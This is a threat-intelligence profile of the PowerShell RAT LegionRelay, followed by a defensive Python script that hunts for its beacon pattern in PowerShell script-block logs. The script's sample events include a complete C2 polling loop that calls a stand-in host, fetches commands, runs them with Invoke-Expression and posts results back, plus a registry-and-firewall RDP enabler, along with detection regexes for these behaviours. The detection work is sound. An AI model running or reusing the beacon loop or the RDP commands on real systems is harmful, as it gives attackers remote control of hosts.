LegionRelay
Intelligence Profile
According to WithSecure, LegionRelay is a lightweight PowerShell-based RAT that communicates with its C2 over a REST API. The client executes operator-issued PowerShell commands and relies on post-compromise scripts to extend its capabilities, including file enumeration, exfiltration, screenshots, browser data theft, and remote access such as enabling RDP. The tooling is part of GREYVIBE's broader loader/obfuscator ecosystem, and obfuscation and loader variants are used to evolve the malware over time. Operators are Russian-speaking and active on Moscow-time hours, which points to a Russia nexus that overlaps with wider cybercrime activity.
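The behaviour described above (a PowerShell client that polls a REST endpoint, runs whatever command comes back, posts the output, and later pulls in scripts such as an RDP enabler) is the kind of pattern that surfaces in PowerShell script-block logging (Event ID 4104 in Microsoft-Windows-PowerShell/Operational). The hunting script below is an added example, not code from WithSecure or from the page; the indicators are generic heuristics written from the behaviour described here, not published LegionRelay IOCs, the log entries are constructed samples, and the C2 address is a documentation IP. The key scoring choice is that a REST call or Invoke-Expression alone is common in admin scripting, but the two together in one script block is what makes a beacon.

```python
import re
from dataclasses import dataclass

# Constructed PowerShell script-block log entries (Event ID 4104 shape); none of
# these are real LegionRelay samples, and 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [
    {"EventID": 4104, "Host": "WS01",
     "ScriptBlockText": "Get-ChildItem C:\\Users -Recurse | Measure-Object"},
    {"EventID": 4104, "Host": "WS02",
     "ScriptBlockText": (
         "while ($true) { $t = Invoke-RestMethod -Uri 'http://203.0.113.10/api/task' -Method Get; "
         "if ($t.cmd) { $r = Invoke-Expression $t.cmd | Out-String; "
         "Invoke-RestMethod -Uri 'http://203.0.113.10/api/result' -Method Post -Body $r }; "
         "Start-Sleep -Seconds 30 }")},
    {"EventID": 4104, "Host": "WS03",
     "ScriptBlockText": (
         "Set-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server' "
         "-Name fDenyTSConnections -Value 0; Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'")},
    {"EventID": 4104, "Host": "WS04",
     "ScriptBlockText": "$w = Invoke-WebRequest -Uri 'https://example.org/release.json'; "
                        "($w.Content | ConvertFrom-Json).version"},
]

# (tag, weight, regex) heuristics derived from the described behaviour; hypothetical, not vendor IOCs.
INDICATORS = [
    ("rest_call",    2, r"Invoke-RestMethod|Invoke-WebRequest|Net\.WebClient|HttpClient"),
    ("dynamic_exec", 3, r"Invoke-Expression|\biex\b|\[ScriptBlock\]::Create"),
    ("poll_loop",    1, r"\bwhile\s*\(|\bdo\s*\{"),
    ("post_back",    1, r"-Method\s+Post\b"),
    ("rdp_enable",   3, r"fDenyTSConnections|DisplayGroup\s+['\"]Remote Desktop['\"]"),
    ("screenshot",   2, r"CopyFromScreen|Graphics\.FromImage"),
]


@dataclass
class Finding:
    host: str
    score: int
    severity: str
    tags: list


def score_script_block(text: str):
    """Return (score, tags) for one script-block text, case-insensitively."""
    score, tags = 0, []
    for tag, weight, pattern in INDICATORS:
        if re.search(pattern, text, re.IGNORECASE):
            score += weight
            tags.append(tag)
    # A REST fetch plus dynamic execution in the same block is the beacon shape
    # described for LegionRelay; either one alone is routine admin scripting.
    if "rest_call" in tags and "dynamic_exec" in tags:
        score += 3
        tags.append("c2_beacon")
    return score, tags


def severity_for(score: int) -> str:
    if score >= 6:
        return "high"
    if score >= 3:
        return "medium"
    return "none"


def hunt(events, min_score: int = 3):
    """Score 4104 script-block events and return findings at or above min_score, highest first."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4104:  # only script-block events carry the full text
            continue
        score, tags = score_script_block(ev.get("ScriptBlockText", ""))
        if score >= min_score:
            findings.append(Finding(ev["Host"], score, severity_for(score), tags))
    return sorted(findings, key=lambda f: -f.score)


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.host}: {f.severity} ({f.score}) {', '.join(f.tags)}")
```

In use, the event list would come from an exported EVTX or a SIEM query rather than the inline samples; the RDP enabler on WS03 scores only "medium" on its own because the post-compromise scripts are separate from the client, so correlating it with an earlier beacon hit on the same host is what raises confidence.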
Threat Analysis
LegionRelay is malware rather than a threat actor: a lightweight PowerShell RAT operated within the GREYVIBE loader/obfuscator ecosystem. Its sophistication is modest (the client itself only executes commands fetched over REST, with capabilities added by post-compromise scripts), the operators' national origin is not established beyond the Russian-language and Moscow-time indicators noted above, and their primary motivation is not established, although the activity overlaps with broader cybercrime.